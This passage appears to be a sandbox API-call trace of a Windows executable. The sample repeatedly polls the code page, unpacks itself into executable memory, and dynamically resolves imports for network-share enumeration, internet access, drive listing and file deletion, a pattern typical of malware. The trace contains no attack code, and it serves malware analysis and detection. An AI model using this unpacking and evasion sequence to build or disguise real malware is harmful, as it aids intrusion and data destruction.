[0103.538] GetACP () returned 0x4e4 [0103.538] GetLastError () returned 0x0 [0103.538] GetACP () returned 0x4e4 [0103.538] GetLastError () returned 0x0 [0103.539] GetACP () returned 0x4e4 [0103.539] GetLastError () returned 0x0 [0103.539] GetACP () returned 0x4e4 [0103.539] GetLastError () returned 0x0 [0103.539] GetACP () returned 0x4e4 [0103.539] GetLastError () returned 0x0 [0103.539] GetACP () returned 0x4e4 [0103.539] GetLastError () returned 0x0 [0103.539] GetACP () returned 0x4e4 [0103.539] GetLastError () returned 0x0 [0103.539] GetACP () returned 0x4e4 [0103.539] GetLastError () returned 0x0 [0103.539] GetACP () returned 0x4e4 [0103.539] GetLastError () returned 0x0 [0103.539] GetACP () returned 0x4e4 [0103.539] GetLastError () returned 0x0 [0103.539] GetACP () returned 0x4e4 [0103.539] GetLastError () returned 0x0 [0103.539] GetACP () returned 0x4e4 [0103.539] GetLastError () returned 0x0 [0103.539] GetACP () returned 0x4e4 [0103.539] GetLastError () returned 0x0 [0103.539] GetACP () returned 0x4e4 [0103.539] GetLastError () returned 0x0 [0103.539] GetACP () returned 0x4e4 [0103.539] GetLastError () returned 0x0 [0103.539] GetACP () returned 0x4e4 [0103.539] GetLastError () returned 0x0 [0103.539] GetACP () returned 0x4e4 [0103.539] GetLastError () returned 0x0 [0103.539] GetACP () returned 0x4e4 [0103.539] GetLastError () returned 0x0 [0103.539] GetACP () returned 0x4e4 [0103.539] GetLastError () returned 0x0 [0103.539] GetACP () returned 0x4e4 [0103.540] GetLastError () returned 0x0 [0103.540] GetACP () returned 0x4e4 [0103.540] GetLastError () returned 0x0 [0103.540] GetACP () returned 0x4e4 [0103.540] GetLastError () returned 0x0 [0103.540] GetACP () returned 0x4e4 [0103.540] GetLastError () returned 0x0 [0103.540] GetACP () returned 0x4e4 [0103.540] GetLastError () returned 0x0 [0103.540] GetACP () returned 0x4e4 [0103.540] GetLastError () returned 0x0 [0103.540] GetACP () returned 0x4e4 [0103.540] GetLastError () returned 0x0 [0103.540] GetACP () returned 0x4e4 [0103.540] GetLastError () returned 0x0 [0103.540] GetACP () returned 0x4e4 [0103.540] GetLastError () returned 0x0 [0103.540] GetACP () returned 0x4e4 [0103.540] GetLastError () returned 0x0 [0103.540] GetACP () returned 0x4e4 [0103.540] GetLastError () returned 0x0 [0103.540] GetACP () returned 0x4e4 [0103.540] GetLastError () returned 0x0 [0103.540] GetACP () returned 0x4e4 [0103.540] GetLastError () returned 0x0 [0103.540] GetACP () returned 0x4e4 [0103.540] GetLastError () returned 0x0 [0103.540] GetACP () returned 0x4e4 [0103.540] GetLastError () returned 0x0 [0103.540] GetACP () returned 0x4e4 [0103.540] GetLastError () returned 0x0 [0103.540] GetACP () returned 0x4e4 [0103.540] GetLastError () returned 0x0 [0103.540] GetACP () returned 0x4e4 [0103.540] GetLastError () returned 0x0 [0103.541] GetACP () returned 0x4e4 [0103.541] GetLastError () returned 0x0 [0103.541] GetACP () returned 0x4e4 [0103.541] GetLastError () returned 0x0 [0103.541] GetACP () returned 0x4e4 [0103.541] GetLastError () returned 0x0 [0103.541] GetACP () returned 0x4e4 [0103.541] GetLastError () returned 0x0 [0103.541] GetACP () returned 0x4e4 [0103.541] GetLastError () returned 0x0 [0103.541] GetACP () returned 0x4e4 [0103.541] GetLastError () returned 0x0 [0103.541] GetACP () returned 0x4e4 [0103.541] GetLastError () returned 0x0 [0103.541] GetACP () returned 0x4e4 [0103.541] GetLastError () returned 0x0 [0103.541] GetACP () returned 0x4e4 [0103.541] GetLastError () returned 0x0 [0103.541] GetACP () returned 0x4e4 [0103.541] GetLastError () returned 0x0 [0103.541] GetACP () returned 0x4e4 [0103.541] GetLastError () returned 0x0 [0103.541] GetACP () returned 0x4e4 [0103.541] GetLastError () returned 0x0 [0103.541] GetACP () returned 0x4e4 [0103.541] GetLastError () returned 0x0 [0103.541] GetACP () returned 0x4e4 [0103.541] GetLastError () returned 0x0 [0103.541] GetACP () returned 0x4e4 [0103.541] GetLastError () returned 0x0 [0103.541] GetACP () returned 0x4e4 [0103.541] GetLastError () returned 0x0 [0103.541] GetACP () returned 0x4e4 [0103.541] GetLastError () returned 0x0 [0103.542] GetACP () returned 0x4e4 [0103.542] GetLastError () returned 0x0 [0103.542] GetACP () returned 0x4e4 [0103.542] GetLastError () returned 0x0 [0103.542] GetACP () returned 0x4e4 [0103.542] GetLastError () returned 0x0 [0103.542] GetACP () returned 0x4e4 [0103.542] GetLastError () returned 0x0 [0103.542] GetACP () returned 0x4e4 [0103.542] GetLastError () returned 0x0 [0103.542] GetACP () returned 0x4e4 [0103.542] GetLastError () returned 0x0 [0103.542] GetACP () returned 0x4e4 [0103.542] GetLastError () returned 0x0 [0103.542] GetACP () returned 0x4e4 [0103.542] GetLastError () returned 0x0 [0103.542] GetACP () returned 0x4e4 [0103.542] GetLastError () returned 0x0 [0103.542] GetACP () returned 0x4e4 [0103.542] GetLastError () returned 0x0 [0103.542] GetACP () returned 0x4e4 [0103.542] GetLastError () returned 0x0 [0103.542] GetACP () returned 0x4e4 [0103.542] GetLastError () returned 0x0 [0103.542] GetACP () returned 0x4e4 [0103.542] GetLastError () returned 0x0 [0103.542] GetACP () returned 0x4e4 [0103.542] GetLastError () returned 0x0 [0103.542] GetACP () returned 0x4e4 [0103.542] GetLastError () returned 0x0 [0103.542] GetACP () returned 0x4e4 [0103.542] GetLastError () returned 0x0 [0103.542] GetACP () returned 0x4e4 [0103.542] GetLastError () returned 0x0 [0103.543] GetACP () returned 0x4e4 [0103.543] GetLastError () returned 0x0 [0103.543] GetACP () returned 0x4e4 [0103.543] GetLastError () returned 0x0 [0103.543] GetACP () returned 0x4e4 [0103.543] GetLastError () returned 0x0 [0103.543] GetACP () returned 0x4e4 [0103.543] GetLastError () returned 0x0 [0103.543] GetACP () returned 0x4e4 [0103.543] GetLastError () returned 0x0 [0103.543] GetACP () returned 0x4e4 [0103.543] GetLastError () returned 0x0 [0103.543] GetACP () returned 0x4e4 [0103.543] GetLastError () returned 0x0 [0103.543] GetACP () returned 0x4e4 [0103.543] GetLastError () returned 0x0 [0103.543] GetACP () returned 0x4e4 [0103.543] GetLastError () returned 0x0 [0103.543] GetACP () returned 0x4e4 [0103.543] GetLastError () returned 0x0 [0103.543] GetACP () returned 0x4e4 [0103.543] GetLastError () returned 0x0 [0103.543] GetACP () returned 0x4e4 [0103.543] GetLastError () returned 0x0 [0103.543] GetACP () returned 0x4e4 [0103.543] GetLastError () returned 0x0 [0103.543] GetACP () returned 0x4e4 [0103.543] GetLastError () returned 0x0 [0103.543] GetACP () returned 0x4e4 [0103.543] GetLastError () returned 0x0 [0103.543] GetACP () returned 0x4e4 [0103.543] GetLastError () returned 0x0 [0103.543] GetACP () returned 0x4e4 [0103.543] GetLastError () returned 0x0 [0103.544] GetACP () returned 0x4e4 [0103.544] GetLastError () returned 0x0 [0103.544] GetACP () returned 0x4e4 [0103.544] GetLastError () returned 0x0 [0103.544] GetACP () returned 0x4e4 [0103.544] GetLastError () returned 0x0 [0103.544] GetACP () returned 0x4e4 [0103.544] GetLastError () returned 0x0 [0103.544] GetACP () returned 0x4e4 [0103.544] GetLastError () returned 0x0 [0103.544] GetACP () returned 0x4e4 [0103.544] GetLastError () returned 0x0 [0103.544] GetACP () returned 0x4e4 [0103.544] GetLastError () returned 0x0 [0103.544] GetACP () returned 0x4e4 [0103.544] GetLastError () returned 0x0 [0103.544] GetACP () returned 0x4e4 [0103.544] GetLastError () returned 0x0 [0103.544] GetACP () returned 0x4e4 [0103.544] GetLastError () returned 0x0 [0103.544] GetACP () returned 0x4e4 [0103.544] GetLastError () returned 0x0 [0103.544] GetACP () returned 0x4e4 [0103.544] GetLastError () returned 0x0 [0103.544] GetACP () returned 0x4e4 [0103.544] GetLastError () returned 0x0 [0103.544] GetACP () returned 0x4e4 [0103.544] GetLastError () returned 0x0 [0103.544] GetACP () returned 0x4e4 [0103.544] GetLastError () returned 0x0 [0103.544] GetACP () returned 0x4e4 [0103.544] GetLastError () returned 0x0 [0103.544] GetACP () returned 0x4e4 [0103.544] GetLastError () returned 0x0 [0103.545] GetACP () returned 0x4e4 [0104.178] LocalAlloc (uFlags=0x0, uBytes=0x90e9d) returned 0x2f0020 [0104.327] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76e10000 [0104.328] GetProcAddress (hModule=0x76e10000, lpProcName="VirtualProtect") returned 0x76e2435f [0104.328] VirtualProtect (in: lpAddress=0x2f0020, dwSize=0x90e9d, flNewProtect=0x40, lpflOldProtect=0x18f744 | out: lpflOldProtect=0x18f744*=0x4) returned 1 [0104.397] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76e10000 [0104.397] GetProcAddress (hModule=0x76e10000, lpProcName="GlobalAlloc") returned 0x76e2588e [0104.397] GetProcAddress (hModule=0x76e10000, lpProcName="GetLastError") returned 0x76e211c0 [0104.397] GetProcAddress (hModule=0x76e10000, lpProcName="Sleep") returned 0x76e210ff [0104.397] GetProcAddress (hModule=0x76e10000, lpProcName="VirtualAlloc") returned 0x76e21856 [0104.397] GetProcAddress (hModule=0x76e10000, lpProcName="CreateToolhelp32Snapshot") returned 0x76e4735f [0104.397] GetProcAddress (hModule=0x76e10000, lpProcName="Module32First") returned 0x76ea5cd9 [0104.397] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0104.397] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0x44 [0104.405] Module32First (hSnapshot=0x44, lpme=0x18f4d0) returned 1 [0104.407] VirtualAlloc (lpAddress=0x0, dwSize=0x119e50, flAllocationType=0x1000, flProtect=0x40) returned 0x710000 [0104.489] GetProcAddress (hModule=0x76e10000, lpProcName="LoadLibraryA") returned 0x76e249d7 [0104.489] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76e10000 [0104.489] GetProcAddress (hModule=0x76e10000, lpProcName="VirtualAlloc") returned 0x76e21856 [0104.489] GetProcAddress (hModule=0x76e10000, lpProcName="VirtualProtect") returned 0x76e2435f [0104.489] GetProcAddress (hModule=0x76e10000, lpProcName="VirtualFree") returned 0x76e2186e [0104.489] GetProcAddress (hModule=0x76e10000, lpProcName="GetVersionExA") returned 0x76e23519 [0104.489] GetProcAddress (hModule=0x76e10000, lpProcName="TerminateProcess") returned 0x76e3d802 [0104.489] GetProcAddress (hModule=0x76e10000, lpProcName="ExitProcess") returned 0x76e27a10 [0104.489] GetProcAddress (hModule=0x76e10000, lpProcName="SetErrorMode") returned 0x76e21b00 [0104.489] SetErrorMode (uMode=0x400) returned 0x0 [0104.489] SetErrorMode (uMode=0x0) returned 0x400 [0104.490] GetVersionExA (in: lpVersionInformation=0x18e400*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x65006564, dwMinorVersion=0x7373, dwBuildNumber=0x3, dwPlatformId=0xffffffff, szCSDVersion="s}5w") | out: lpVersionInformation=0x18e400*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0104.490] VirtualAlloc (lpAddress=0x0, dwSize=0x119000, flAllocationType=0x1000, flProtect=0x4) returned 0x870000 [0104.512] VirtualProtect (in: lpAddress=0x400000, dwSize=0x137000, flNewProtect=0x40, lpflOldProtect=0x18f488 | out: lpflOldProtect=0x18f488*=0x2) returned 1 [0105.068] VirtualFree (lpAddress=0x870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0105.073] LoadLibraryA (lpLibFileName="RPCRT4.dll") returned 0x768e0000 [0105.074] GetProcAddress (hModule=0x768e0000, lpProcName="RpcStringFreeW") returned 0x76901635 [0105.074] GetProcAddress (hModule=0x768e0000, lpProcName="UuidCreate") returned 0x768ff48b [0105.074] GetProcAddress (hModule=0x768e0000, lpProcName="UuidToStringW") returned 0x76921ee5 [0105.074] GetProcAddress (hModule=0x768e0000, lpProcName="RpcStringFreeA") returned 0x76923fc5 [0105.074] GetProcAddress (hModule=0x768e0000, lpProcName="UuidToStringA") returned 0x7695d918 [0105.074] LoadLibraryA (lpLibFileName="MPR.dll") returned 0x74550000 [0105.077] GetProcAddress (hModule=0x74550000, lpProcName="WNetOpenEnumW") returned 0x74552f06 [0105.077] GetProcAddress (hModule=0x74550000, lpProcName="WNetEnumResourceW") returned 0x74553058 [0105.078] GetProcAddress (hModule=0x74550000, lpProcName="WNetCloseEnum") returned 0x74552dd6 [0105.078] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x75190000 [0105.223] GetProcAddress (hModule=0x75190000, lpProcName="InternetCloseHandle") returned 0x751aab49 [0105.223] GetProcAddress (hModule=0x75190000, lpProcName="InternetReadFile") returned 0x751ab406 [0105.223] GetProcAddress (hModule=0x75190000, lpProcName="InternetOpenUrlW") returned 0x7520be5c [0105.223] GetProcAddress (hModule=0x75190000, lpProcName="InternetOpenW") returned 0x751b9197 [0105.223] GetProcAddress (hModule=0x75190000, lpProcName="HttpQueryInfoW") returned 0x751b5c75 [0105.224] GetProcAddress (hModule=0x75190000, lpProcName="InternetOpenA") returned 0x751bf18e [0105.224] GetProcAddress (hModule=0x75190000, lpProcName="InternetOpenUrlA") returned 0x751d30f1 [0105.224] LoadLibraryA (lpLibFileName="WINMM.dll") returned 0x74510000 [0105.227] GetProcAddress (hModule=0x74510000, lpProcName="timeGetTime") returned 0x745126e0 [0105.227] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x753b0000 [0105.227] GetProcAddress (hModule=0x753b0000, lpProcName="PathAppendA") returned 0x753bd65e [0105.228] GetProcAddress (hModule=0x753b0000, lpProcName="PathFindFileNameW") returned 0x753cbb71 [0105.228] GetProcAddress (hModule=0x753b0000, lpProcName="PathRemoveFileSpecW") returned 0x753c3248 [0105.228] GetProcAddress (hModule=0x753b0000, lpProcName="PathFileExistsA") returned 0x753ead1a [0105.228] GetProcAddress (hModule=0x753b0000, lpProcName="PathFileExistsW") returned 0x753c45bf [0105.228] GetProcAddress (hModule=0x753b0000, lpProcName="PathAppendW") returned 0x753c81ef [0105.228] GetProcAddress (hModule=0x753b0000, lpProcName="PathFindExtensionW") returned 0x753ca1b9 [0105.228] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76e10000 [0105.228] GetProcAddress (hModule=0x76e10000, lpProcName="VirtualFree") returned 0x76e2186e [0105.228] GetProcAddress (hModule=0x76e10000, lpProcName="WriteFile") returned 0x76e21282 [0105.228] GetProcAddress (hModule=0x76e10000, lpProcName="GetDriveTypeA") returned 0x76e3ef75 [0105.228] GetProcAddress (hModule=0x76e10000, lpProcName="OpenProcess") returned 0x76e21986 [0105.229] GetProcAddress (hModule=0x76e10000, lpProcName="GlobalAlloc") returned 0x76e2588e [0105.229] GetProcAddress (hModule=0x76e10000, lpProcName="GetSystemDirectoryW") returned 0x76e25063 [0105.229] GetProcAddress (hModule=0x76e10000, lpProcName="WideCharToMultiByte") returned 0x76e2170d [0105.229] GetProcAddress (hModule=0x76e10000, lpProcName="LoadLibraryW") returned 0x76e2492b [0105.229] GetProcAddress (hModule=0x76e10000, lpProcName="Sleep") returned 0x76e210ff [0105.229] GetProcAddress (hModule=0x76e10000, lpProcName="CopyFileW") returned 0x76e4830d [0105.229] GetProcAddress (hModule=0x76e10000, lpProcName="FormatMessageW") returned 0x76e24620 [0105.229] GetProcAddress (hModule=0x76e10000, lpProcName="lstrcpynW") returned 0x76e4d556 [0105.229] GetProcAddress (hModule=0x76e10000, lpProcName="CreateProcessA") returned 0x76e21072 [0105.229] GetProcAddress (hModule=0x76e10000, lpProcName="TerminateProcess") returned 0x76e3d802 [0105.229] GetProcAddress (hModule=0x76e10000, lpProcName="ReadFile") returned 0x76e23ed3 [0105.229] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileW") returned 0x76e23f5c [0105.230] GetProcAddress (hModule=0x76e10000, lpProcName="lstrcatA") returned 0x76e42b7a [0105.230] GetProcAddress (hModule=0x76e10000, lpProcName="GetEnvironmentVariableA") returned 0x76e233a0 [0105.230] GetProcAddress (hModule=0x76e10000, lpProcName="lstrcmpW") returned 0x76e25929 [0105.230] GetProcAddress (hModule=0x76e10000, lpProcName="MultiByteToWideChar") returned 0x76e2192e [0105.230] GetProcAddress (hModule=0x76e10000, lpProcName="lstrlenW") returned 0x76e21700 [0105.230] GetProcAddress (hModule=0x76e10000, lpProcName="FlushFileBuffers") returned 0x76e2469b [0105.230] GetProcAddress (hModule=0x76e10000, lpProcName="GetShortPathNameA") returned 0x76e4594d [0105.230] GetProcAddress (hModule=0x76e10000, lpProcName="GetFileSizeEx") returned 0x76e259e2 [0105.230] GetProcAddress (hModule=0x76e10000, lpProcName="GetLastError") returned 0x76e211c0 [0105.230] GetProcAddress (hModule=0x76e10000, lpProcName="SetLastError") returned 0x76e211a9 [0105.230] GetProcAddress (hModule=0x76e10000, lpProcName="GetProcAddress") returned 0x76e21222 [0105.230] GetProcAddress (hModule=0x76e10000, lpProcName="VirtualAlloc") returned 0x76e21856 [0105.230] GetProcAddress (hModule=0x76e10000, lpProcName="MoveFileW") returned 0x76e39af0 [0105.231] GetProcAddress (hModule=0x76e10000, lpProcName="FindClose") returned 0x76e24442 [0105.231] GetProcAddress (hModule=0x76e10000, lpProcName="Process32FirstW") returned 0x76e48baf [0105.231] GetProcAddress (hModule=0x76e10000, lpProcName="LocalAlloc") returned 0x76e2168c [0105.231] GetProcAddress (hModule=0x76e10000, lpProcName="CreateEventW") returned 0x76e2183e [0105.231] GetProcAddress (hModule=0x76e10000, lpProcName="GetModuleFileNameA") returned 0x76e214b1 [0105.231] GetProcAddress (hModule=0x76e10000, lpProcName="Process32NextW") returned 0x76e4896c [0105.231] GetProcAddress (hModule=0x76e10000, lpProcName="lstrcatW") returned 0x76e4828e [0105.231] GetProcAddress (hModule=0x76e10000, lpProcName="CreateMutexA") returned 0x76e24c6b [0105.231] GetProcAddress (hModule=0x76e10000, lpProcName="FindNextFileW") returned 0x76e254ee [0105.232] GetProcAddress (hModule=0x76e10000, lpProcName="CreateToolhelp32Snapshot") returned 0x76e4735f [0105.232] GetProcAddress (hModule=0x76e10000, lpProcName="SetEnvironmentVariableA") returned 0x76e2e331 [0105.232] GetProcAddress (hModule=0x76e10000, lpProcName="DeleteFileW") returned 0x76e289b3 [0105.232] GetProcAddress (hModule=0x76e10000, lpProcName="LocalFree") returned 0x76e22d3c [0105.232] GetProcAddress (hModule=0x76e10000, lpProcName="lstrcpyW") returned 0x76e43102 [0105.232] GetProcAddress (hModule=0x76e10000, lpProcName="DeleteFileA") returned 0x76e25444 [0105.232] GetProcAddress (hModule=0x76e10000, lpProcName="lstrcpyA") returned 0x76e42a9d [0105.232] GetProcAddress (hModule=0x76e10000, lpProcName="SetPriorityClass") returned 0x76e3cf28 [0105.232] GetProcAddress (hModule=0x76e10000, lpProcName="GetCurrentProcess") returned 0x76e21809 [0105.232] GetProcAddress (hModule=0x76e10000, lpProcName="GetComputerNameW") returned 0x76e2dd0e [0105.232] GetProcAddress (hModule=0x76e10000, lpProcName="GetLogicalDrives") returned 0x76e25371 [0105.233] GetProcAddress (hModule=0x76e10000, lpProcName="GetModuleFileNameW") returned 0x76e24950 [0105.233] GetProcAddress (hModule=0x76e10000, lpProcName="SetStdHandle") returned 0x76ea454f [0105.233] GetProcAddress (hModule=0x76e10000, lpProcName="GetVersion") returned 0x76e24467 [0105.233] GetProcAddress (hModule=0x76e10000, lpProcName="CreateDirectoryA") returned 0x76e4d526 [0105.233] GetProcAddress (hModule=0x76e10000, lpProcName="CreateThread") returned 0x76e234d5 [0105.233] GetProcAddress (hModule=0x76e10000, lpProcName="CompareStringW") returned 0x76e23bca [0105.233] GetProcAddress (hModule=0x76e10000, lpProcName="GetTimeFormatW") returned 0x76e3f481 [0105.233] GetProcAddress (hModule=0x76e10000, lpProcName="GetDateFormatW") returned 0x76e434d7 [0105.233] GetProcAddress (hModule=0x76e10000, lpProcName="EnumSystemLocalesW") returned 0x76ea425f [0105.233] GetProcAddress (hModule=0x76e10000, lpProcName="GetUserDefaultLCID") returned 0x76e23da5 [0105.233] GetProcAddress (hModule=0x76e10000, lpProcName="IsValidLocale") returned 0x76e3ce46 [0105.234] GetProcAddress (hModule=0x76e10000, lpProcName="GetLocaleInfoW") returned 0x76e23c42 [0105.234] GetProcAddress (hModule=0x76e10000, lpProcName="CreateSemaphoreW") returned 0x76e3ca5a [0105.234] GetProcAddress (hModule=0x76e10000, lpProcName="GetModuleHandleW") returned 0x76e234b0 [0105.234] GetProcAddress (hModule=0x76e10000, lpProcName="GetTickCount") returned 0x76e2110c [0105.234] GetProcAddress (hModule=0x76e10000, lpProcName="TlsFree") returned 0x76e23587 [0105.234] GetProcAddress (hModule=0x76e10000, lpProcName="TlsSetValue") returned 0x76e214fb [0105.234] GetProcAddress (hModule=0x76e10000, lpProcName="TlsGetValue") returned 0x76e211e0 [0105.234] GetProcAddress (hModule=0x76e10000, lpProcName="TlsAlloc") returned 0x76e249ad [0105.234] GetProcAddress (hModule=0x76e10000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76e21916 [0105.234] GetProcAddress (hModule=0x76e10000, lpProcName="SetUnhandledExceptionFilter") returned 0x76e287c9 [0105.234] GetProcAddress (hModule=0x76e10000, lpProcName="UnhandledExceptionFilter") returned 0x76e4772f [0105.235] GetProcAddress (hModule=0x76e10000, lpProcName="GetModuleHandleA") returned 0x76e21245 [0105.235] GetProcAddress (hModule=0x76e10000, lpProcName="GetVersionExA") returned 0x76e23519 [0105.235] GetProcAddress (hModule=0x76e10000, lpProcName="GlobalMemoryStatus") returned 0x76e28b6d [0105.235] GetProcAddress (hModule=0x76e10000, lpProcName="LoadLibraryA") returned 0x76e249d7 [0105.235] GetProcAddress (hModule=0x76e10000, lpProcName="FlushConsoleInputBuffer") returned 0x76ec7a9f [0105.235] GetProcAddress (hModule=0x76e10000, lpProcName="WaitForSingleObject") returned 0x76e21136 [0105.235] GetProcAddress (hModule=0x76e10000, lpProcName="CreateDirectoryW") returned 0x76e24259 [0105.235] GetProcAddress (hModule=0x76e10000, lpProcName="SetFilePointerEx") returned 0x76e3c807 [0105.235] GetProcAddress (hModule=0x76e10000, lpProcName="CreateProcessW") returned 0x76e2103d [0105.236] GetProcAddress (hModule=0x76e10000, lpProcName="FreeLibrary") returned 0x76e234c8 [0105.236] GetProcAddress (hModule=0x76e10000, lpProcName="SetErrorMode") returned 0x76e21b00 [0105.236] GetProcAddress (hModule=0x76e10000, lpProcName="lstrlenA") returned 0x76e25a4b [0105.236] GetProcAddress (hModule=0x76e10000, lpProcName="SetFilePointer") returned 0x76e217d1 [0105.236] GetProcAddress (hModule=0x76e10000, lpProcName="FindFirstFileW") returned 0x76e24435 [0105.236] GetProcAddress (hModule=0x76e10000, lpProcName="SetConsoleMode") returned 0x76e3a77d [0105.236] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0105.236] GetProcAddress (hModule=0x76e10000, lpProcName="GetCommandLineW") returned 0x76e25223 [0105.236] GetProcAddress (hModule=0x76e10000, lpProcName="GetNumberOfConsoleInputEvents") returned 0x76ec793f [0105.236] GetProcAddress (hModule=0x76e10000, lpProcName="PeekConsoleInputA") returned 0x76ec6f0d [0105.237] GetProcAddress (hModule=0x76e10000, lpProcName="FreeEnvironmentStringsW") returned 0x76e251cb [0105.237] GetProcAddress (hModule=0x76e10000, lpProcName="GetEnvironmentStringsW") returned 0x76e251e3 [0105.237] GetProcAddress (hModule=0x76e10000, lpProcName="GetCurrentProcessId") returned 0x76e211f8 [0105.237] GetProcAddress (hModule=0x76e10000, lpProcName="QueryPerformanceCounter") returned 0x76e21725 [0105.237] GetProcAddress (hModule=0x76e10000, lpProcName="GetTimeZoneInformation") returned 0x76e2465a [0105.237] GetProcAddress (hModule=0x76e10000, lpProcName="RaiseException") returned 0x76e258a6 [0105.237] GetProcAddress (hModule=0x76e10000, lpProcName="GetStringTypeW") returned 0x76e21946 [0105.237] GetProcAddress (hModule=0x76e10000, lpProcName="GetConsoleCP") returned 0x76ec7bff [0105.237] GetProcAddress (hModule=0x76e10000, lpProcName="ReadConsoleW") returned 0x76ec739a [0105.237] GetProcAddress (hModule=0x76e10000, lpProcName="GetConsoleMode") returned 0x76e21328 [0105.237] GetProcAddress (hModule=0x76e10000, lpProcName="HeapSize") returned 0x77353002 [0105.237] GetProcAddress (hModule=0x76e10000, lpProcName="LoadLibraryExW") returned 0x76e2495d [0105.238] GetProcAddress (hModule=0x76e10000, lpProcName="OutputDebugStringW") returned 0x76e4d1d4 [0105.238] GetProcAddress (hModule=0x76e10000, lpProcName="SetConsoleCtrlHandler") returned 0x76e28a09 [0105.238] GetProcAddress (hModule=0x76e10000, lpProcName="RtlUnwind") returned 0x76e4d1c3 [0105.238] GetProcAddress (hModule=0x76e10000, lpProcName="FatalAppExitA") returned 0x76ea4691 [0105.238] GetProcAddress (hModule=0x76e10000, lpProcName="GetStartupInfoW") returned 0x76e24d40 [0105.238] GetProcAddress (hModule=0x76e10000, lpProcName="GetExitCodeProcess") returned 0x76e3174d [0105.238] GetProcAddress (hModule=0x76e10000, lpProcName="LCMapStringW") returned 0x76e217b9 [0105.238] GetProcAddress (hModule=0x76e10000, lpProcName="DeleteCriticalSection") returned 0x773545f5 [0105.238] GetProcAddress (hModule=0x76e10000, lpProcName="AreFileApisANSI") returned 0x76ea40d1 [0105.238] GetProcAddress (hModule=0x76e10000, lpProcName="ExitProcess") returned 0x76e27a10 [0105.238] GetProcAddress (hModule=0x76e10000, lpProcName="GetProcessHeap") returned 0x76e214e9 [0105.239] GetProcAddress (hModule=0x76e10000, lpProcName="HeapReAlloc") returned 0x77361f6e [0105.239] GetProcAddress (hModule=0x76e10000, lpProcName="GlobalFree") returned 0x76e25558 [0105.239] GetProcAddress (hModule=0x76e10000, lpProcName="SetEndOfFile") returned 0x76e3ce2e [0105.239] GetProcAddress (hModule=0x76e10000, lpProcName="ReadConsoleInputA") returned 0x76ec6f53 [0105.239] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0105.239] GetProcAddress (hModule=0x76e10000, lpProcName="HeapFree") returned 0x76e214c9 [0105.239] GetProcAddress (hModule=0x76e10000, lpProcName="HeapAlloc") returned 0x7734e026 [0105.239] GetProcAddress (hModule=0x76e10000, lpProcName="EnterCriticalSection") returned 0x773422b0 [0105.239] GetProcAddress (hModule=0x76e10000, lpProcName="LeaveCriticalSection") returned 0x77342270 [0105.239] GetProcAddress (hModule=0x76e10000, lpProcName="GetStdHandle") returned 0x76e251b3 [0105.239] GetProcAddress (hModule=0x76e10000, lpProcName="GetFileType") returned 0x76e23531 [0105.240] GetProcAddress (hModule=0x76e10000, lpProcName="GetModuleHandleExW") returned 0x76e24a6f [0105.240] GetProcAddress (hModule=0x76e10000, lpProcName="WriteConsoleW") returned 0x76e47aca [0105.240] GetProcAddress (hModule=0x76e10000, lpProcName="EncodePointer") returned 0x77360fcb [0105.240] GetProcAddress (hModule=0x76e10000, lpProcName="DecodePointer") returned 0x77359d35 [0105.240] GetProcAddress (hModule=0x76e10000, lpProcName="GetSystemTimeAsFileTime") returned 0x76e23509 [0105.240] GetProcAddress (hModule=0x76e10000, lpProcName="IsDebuggerPresent") returned 0x76e24a5d [0105.240] GetProcAddress (hModule=0x76e10000, lpProcName="IsProcessorFeaturePresent") returned 0x76e25235 [0105.240] GetProcAddress (hModule=0x76e10000, lpProcName="IsValidCodePage") returned 0x76e24493 [0105.240] GetProcAddress (hModule=0x76e10000, lpProcName="GetACP") returned 0x76e2179c [0105.240] GetProcAddress (hModule=0x76e10000, lpProcName="GetOEMCP") returned 0x76e4d1a1 [0105.241] GetProcAddress (hModule=0x76e10000, lpProcName="GetCPInfo") returned 0x76e25189 [0105.241] GetProcAddress (hModule=0x76e10000, lpProcName="GetCurrentThread") returned 0x76e217ec [0105.241] GetProcAddress (hModule=0x76e10000, lpProcName="GetCurrentThreadId") returned 0x76e21450 [0105.241] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x76780000 [0105.241] GetProcAddress (hModule=0x76780000, lpProcName="PeekMessageW") returned 0x767a05ba [0105.241] GetProcAddress (hModule=0x76780000, lpProcName="PostThreadMessageW") returned 0x76798bff [0105.241] GetProcAddress (hModule=0x76780000, lpProcName="DefWindowProcW") returned 0x773525dd [0105.241] GetProcAddress (hModule=0x76780000, lpProcName="DispatchMessageW") returned 0x7679787b [0105.241] GetProcAddress (hModule=0x76780000, lpProcName="UpdateWindow") returned 0x767a3559 [0105.242] GetProcAddress (hModule=0x76780000, lpProcName="CreateWindowExW") returned 0x76798a29 [0105.242] GetProcAddress (hModule=0x76780000, lpProcName="LoadCursorW") returned 0x767988f7 [0105.242] GetProcAddress (hModule=0x76780000, lpProcName="IsWindow") returned 0x76797136 [0105.242] GetProcAddress (hModule=0x76780000, lpProcName="ShowWindow") returned 0x767a0dfb [0105.242] GetProcAddress (hModule=0x76780000, lpProcName="RegisterClassExW") returned 0x7679b17d [0105.242] GetProcAddress (hModule=0x76780000, lpProcName="PostQuitMessage") returned 0x76799abb [0105.242] GetProcAddress (hModule=0x76780000, lpProcName="GetMessageW") returned 0x767978e2 [0105.242] GetProcAddress (hModule=0x76780000, lpProcName="DestroyWindow") returned 0x76799a55 [0105.242] GetProcAddress (hModule=0x76780000, lpProcName="SendMessageW") returned 0x76799679 [0105.242] GetProcAddress (hModule=0x76780000, lpProcName="GetProcessWindowStation") returned 0x76799eea [0105.242] GetProcAddress (hModule=0x76780000, lpProcName="GetUserObjectInformationW") returned 0x76798068 [0105.242] GetProcAddress (hModule=0x76780000, 